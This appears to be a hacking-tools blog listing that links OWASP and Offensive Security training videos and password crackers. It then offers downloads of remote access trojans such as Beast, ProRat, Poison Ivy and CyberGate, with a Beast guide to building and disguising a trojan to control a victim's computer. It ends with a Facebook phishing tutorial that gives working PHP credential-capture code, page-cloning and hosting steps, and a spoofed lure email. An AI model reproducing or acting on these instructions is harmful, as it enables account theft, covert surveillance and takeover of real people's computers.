OWASP AppSec Hacking Videos : Injection,XSS,HTTP Etc

Hey friends, you know i'm really very excited to share this awesome post with you all and this is last post of the month. I bet you all will definitely love OWASP AppSec Video Tutorials Series (Intro,Injection, XSS,HTTP Hacking etc) & this post also. [Reference : OWASP AppSec Tutorials Series, Brought to you by hacking softwares]

# OWASP AppSec Tutorial Series
        As you all know OWASP (Open Web Application Security Project) is the one of the world biggest Cyber Security Organization. They got many conference, events, articles, tutorials, etc.. One of them is OWASP AppSec (Application Security) Video tutorials is one of mine favorite series in which they provided us four different Application Security videos and How to tutorials, complete explanation of Application Security, Injection attacks, Cross Site Scripting, HTTP Security Hacking and Vulnerabilities. I just can say it is mind blowing for beginners, Check out complete Post.

Download All Videos : [Download links by Hackingsoftwares]
                       I've compressed all four videos in one ZIP file you'll require WinRar or any ZIP compressing program to uncompress. Please use VLC media Player for better quality and Sound [Total size of ZIP is 90 MB - 4 Videos & One Read Me Text file]. Thank you.

OWASP AppSec Contains following Videos  : 
All Videos is in English language with voice explanation, Images & Charts Explanation, Good Video & Audio Quality.Introduction to Application Security & Hacking

• Injection Attack - Defense & Video Tutorial with Example
• XSS - Attack - Defense & Video Tutorial with Example
• HTTP Transport Vulnerabilities, Hacking Intro, etc.

*Click on below Image to Download : (Mediafire links) 100% Virus Free*

                                  

Thank you for reading my post, If you've any kind of doubt or question please feel free to comment and let me know your problem. If you like it please do a share to increase us. 

Read More

Real Web Application Hacking Video Lecture by Offensive Security

   Real Web Application Hacking Video Lecture by                      Offensive Security 

         

Hello friends after a long time I'm posting something on Hackingsoftwarez, I was really busy these days in Pen-Testing. Okay fine so today I'm back with an interesting article. You might know what is Offensive Security (The Creator's of Backtrack, Kali Linux & Exploit Database - also one of the most popular Penetration testing company, they also provide professional Hacking & Security course). Their course and books are really very helpful and interesting but unfortunately you've to purchase it or apply for Hacking course. So today we'll giveaway some of their real web application hacking video (Lectures by Offensive Security). It's an amazing and very much helpful for beginners and hackers.

Is this Useful for me ?

All-through, I don't know who're you but i bet you're here to learn Hacking & Security, Since yet might you'd watched many hacking videos but you'll really love this one from Offensive Security. Everyone wants to learn real hacking, - Want to know what is hacking but many of them fail to find sources and learning methods. But I say if you've curiosity and passion to learn and do something you can learn easily, Well I'm not here to inspire you my job is to share articles and make your learning more easy - since yet i'd wrote many hacking & security articles but this is one of the best I'm writing. I would prefer you to watch this video instead of doing CEH lol and I'm quite serious


Am I Eligible to Watch & Understand Lectures ? What I need to Know ?

Hmm.. one of the good question for beginners, You must know little bit about Web Application Programming & Hacking atleast basic. And please watch video in sequence, start from Part 1 to Part 4, Don't directly jump on writing exploits - it's pretty hard. Do not skip anything until you understand - If you do not understand anything please google it there is a ton of information.



I'll strongly recommend all beginners to download and understand these real Web Application Hacking Lectures (by Offensive Security). They'd almost explained everything about Web Application Hacking. Amazing for beginners to learn something new. Don't miss it, Download from below links.

How to Download All Videos

However this time i've not uploaded any video on my own server it's somewhere on other location. If you want to learn step by step how to download those videos click here and read this Short Word file with 5 Easy steps to download amazing hacking videos lectures.

                                                   Click Here To Know How to Download

Thank you for reading my post, If you like it please share it and increase us. If you've any kind of doubt please feel free to comment or dare to ask. 

Read More

THC Hydra v7.2 Download

                                   THC Hydra v7.2 Download

New modulesare easy to add, beside that, it is flexible and very fast.Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, andis made available under GPLv3 with a special OpenSSL license expansion.

                                                       

THC Hydra supports the following protocols. 

Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support and is part of Nessus.

Screenshots:

                                   

                               

                                                      

Download THC Hydra v7.2

Read More

Crack Passwords with SAMInside v2.7.0.1 - Free Download

              Crack Passwords with SAMInside v2.7.0.1 

SAMInside is a password recovery program for cracking lost Windows NT/2000/XP/2003 users' LM or NTLM hashed passwords. It can crack passwords at 10 million passwords per second on a good computer. This is the result of core parts written in assembly language. It also has multi language support and it's translated into five languages

                    

                             

 SAMInside is designated for the recovery of Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7 user passwords.

This program is the first program that started to work with passwords encrypted with syskey, it supports about ten types of importing, four types of exporting hashes and six types of password attack:

Mask attack

Dictionary attack

Hybrid attack

Attack with Rainbow tables

Distributed attack 

Pre-calculated tables attack

DOWNLOAD

Read More

Proxifier v2.91 Free Download

                                      Proxifier v2.91 Free Download
Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains.

Network

Proxifier can process all outgoing TCP connections.

Full IPv6 support.

Tunnel IPv4 connections through IPv6 proxy and vice versa.

Download Application Here

Download Serial Keys Here

Read More

Proxifier v3 for Mac OS and Windows Free Download

           Proxifier v3 for Mac OS and Windows Free Download
Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains.

Network

Proxifier can process all outgoing TCP connections.
Full IPv6 support.
Tunnel IPv4 connections through IPv6 proxy and vice versa.

DOWNLOADS

For Mac OS Click here

For Windows Click here

Read More

Beast v2.07 Complete tutorial and Download

                  Beast v2.07 Complete tutorial and Download

Beast is a Trojan Maker. Turn off all Anti-Virus, While in Use. Lets Start from the Top Left to the Bottom right. The Host is the Person your connecting to. The Port is the Open Hole or Backdoor to the computer which you will Use to View and Control their Computer. The Password is the password you set to acess the Port. The Go-Beast Button is basically the Connect Button which connects your Computer to the Computer with the Server. The Next Port Button is for SIN (A different and Easier BackDoor).

The Start Listening Button is The same as the Go-Beast Button except it Connects to the SIN port. The Build Server Button is Basically to Make a Program that Opens that Backdoor you need. When the Build Server Button is Clicked a New Window will appear. The Window Will Provide different options for your Server. The First Option Button on the Left is the Basic Button. The Basic Button will provide options for the Basic's of your Server. Starting on the Left the SIN Port is the Port or Backdoor you want Opened. Reverse Connection is Basically saying you want to Use the SIN Method which I Recommend because its lots Easier. The other Method (Right) is the Direct Connection Method. Listen Port is the Port or Backdoor you want opened. The Password is the Password you want to set on your Port or Backdoor. The Direct Connection Box is Basically saying yes to Using the Direct Connection Method which I disregard due to the work of finding the Persons IP and having to remember a Password. The Injections are if you want to Inject the Server into a Program or a Process. And the Residing is where you want your sever to be located. The Second Button down from top is the Notifications Button. This Button Tells you all the Ways of getting Keylogging info from your Host and other information. The Third Button from the Top is the Startup Button. As the Name Says. I reconmmend you have them all Checked. The Button Fourth From Top is The Anti-Virus + Firewall Kill Button. This Button Will give you option on what anti Virus and firewalls you want killed or turned off. The Button Fifth From Bottom is Misc. Button. It Gives you Options like An Error Message, Enabling the Keylogger, etc. The Button sixth from the top is the Exe icon. The Icon that the Server will have. Bottom of this Window is the Save and Load which to save the Current Settings of the Server you made. The Load Button is the Button to Load any Previous Saves You Saved before. Save Server Button is to make the Server. The Server Will then appear in the folder or area your Beast 2.07 application is Located. Back to the Original Window you will see may buttons on the Medium Right to Bottom Right. These Buttons are Basically to Do whatever you want to the Computer. See their Screen, interact with the Screen. Make Folders. Destroy, format, it never ends. Now here comes the hard part. I will only explain the SIN port method because using the Host (IP) method is time consuming and wasteful Now lets say you made your server And you use the Reverse Connection method (SIN) and you set your Port to 1234. You now have to get that Server to Whom you want to Troj. Now if the Person you want to Trojan is a dumbass and has no anti-virus and or firewall you shouldn't have any problems getting the Server to Them. Now if your Friend is not so dumb and has firewall and or anti-virus you may have to encrypt it and or bind it with another file like a Picture or a Mp3 file. And you once you find a way to get it to whom your Trojing, and they click on it. Just Type the Port you set on your server click the Start Listening Button and Wahla. Your in and ready to go. Start Watching and Controlling their Computer. It may take awhile for the Server to Pop-Up but it will.

DOWNLOAD

Read More

Netbus v1.7 - Download

                                           Netbus v1.7 - Download

Netbus is a hacking Software by Carl-Fredrik Neikter a Swedish hacker and created by Delphi. This program works under Windows 95/98/Me/2000/XP and NT. Netbus first appeared in 1998 with 1.60 version and Netbus 1.70 version. There are also Netbus Pro v2.01 and Netbus Pro v2.10, released in 1999. Until now, Netbus still be one of the computer security threats.

In my previous post i have given you download link for Netbus v1.6, Here i am providing you Netbus v1.7.

DOWNLOAD Netbus v1.7

Read More

Prorat Tutorial and Download

                              Prorat Tutorial and Download

PRORAT is a powerfull Remote administrator tool (RAT) or you can say it a Trojan. ProRat is written in C++  and it can work with all windows operating systems.

Like all remote administration tools prorat also works in Server and Clint format. First you have to build the server using the clint software and send it to the victim. Once your victim installs the server on his system, then it will send the Port number, IP address to the address provided while bulding the server. Thats it. Now you have to enter IP and Port and connect to the victims system using Clint Software.

You can use prorat either for a legel connection or for the hacking purpose.

DOWNLOAD

Read More

                    Bitfrost v1.2.1 RAT - Download

Bifrost is an advanced Remote Administration Tool that allows you to remotely control computers that are behind firewalls and routers.

In this version the bypassing method has been developed futher and it is again ably to silently to connect through most hardware and software firewalls.

Features:

Cam Capture, File Manager, File Search, Offline/Online Keylogger, Password List (protected storage, cached passwords, icq, cd keys), Polymorphic Plugin, Process List, Remote Shell, Screen Capture, System Info and Windows List.

The main target when developing Bifrost has always been: 1. Stability 2. Better fwb than most other rats 3. Easy to use.

When v1.1 was released 2.5 years ago, it would bypass all software firewalls back then. This because it's injection technique combined with methods to avoid user and kernel level hooks (fwb+).

This has been the main focus when developing this version, so the server has been rewritten and the fwb improved futher. Provided it's an XP and the user is logged in as admin, it is able to silently bypass most software firewalls.

DOWNLOAD

Read More

Poison Ivy v2.3.2 RAT - Free download

                       Poison Ivy v2.3.2 RAT - Free download

Poison Ivy is in my view, the best Remote administration tool. A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control

* File management

* Shell control

* Computer Control

* Registry management

* Other product-specific function ( Source: Wikipedia )

It consists of huge number of features that enable the attacker more ease in attacking a target. It is the most widely used RAT among the Script kiddies as well as Programmers. 

It consists of features like password stealing, keylogging and many more...

The latest vesion of this RAT is "Poison Ivy v2.3.2". You can download this from the link given below. If you have any doubts regarding its use etc, feel free to ask me...

Keep visiting my site for more hacking tools and tutorials... You can find my other RAT'S and download them

DOWNLOAD

Read More

                Shark v2.2 Remote Administration Tool

Shark v2.2 is one of the easy to use RATs. A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control

* File management

* Shell control

* Computer Control

* Registry management

* Other product-specific function ( Source: Wikipedia )

It consists of huge number of features that enable the attacker more ease in attacking a target. It is the most widely used RAT among the Script kiddies as well as Programmers. It consists of features like password stealing, keylogging and many more...

The latest vesion of this RAT is "Shark v2.2". If you have any doubts regarding its use etc, feel free to ask me...

I will provide you its download link in few days...

Keep visiting my site for more hacking tools and tutorials... You can find my other RAT'S HERE and download them.. 

Read More

Cyber Gate v1.07.5 Free Download

                                  Cyber Gate v1.07.5 Free Download

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. 

DOWNLOAD

Read More

                         Turkojan v4 RAT - Download

Turkojan is one of my favorite Remote Administration tools. I personally prefer Turkojan to Prorat because in prorat you have find out your victims IP address. But in case of Turkojan the server itself let you know whenever the victim is live over internet.

Turkojan also have a lot of tools similar to all the other Remote administration tools does.

Turkojan Screenshot:

Download Turkojan v4 

Read More

Facebook Phishing Tutorial

                                      Facebook Phishing Tutorial

Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.

                                                             

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:

First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.

To create phish.php:

Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/

Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.

Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.

Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.

Sub: Invalid activity on your facebook account.

Body:

Hey (victim's facebook user name),

Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,

<link to phished site> normally it will be http://yourusername.somex.com/index.html

Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com, 

Facebook, Inc,

1601 S.California Ave

Palo Alto CA 94394

US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file. 

Please note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:

You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Download files from the following link.

DOWNLOAD

Read More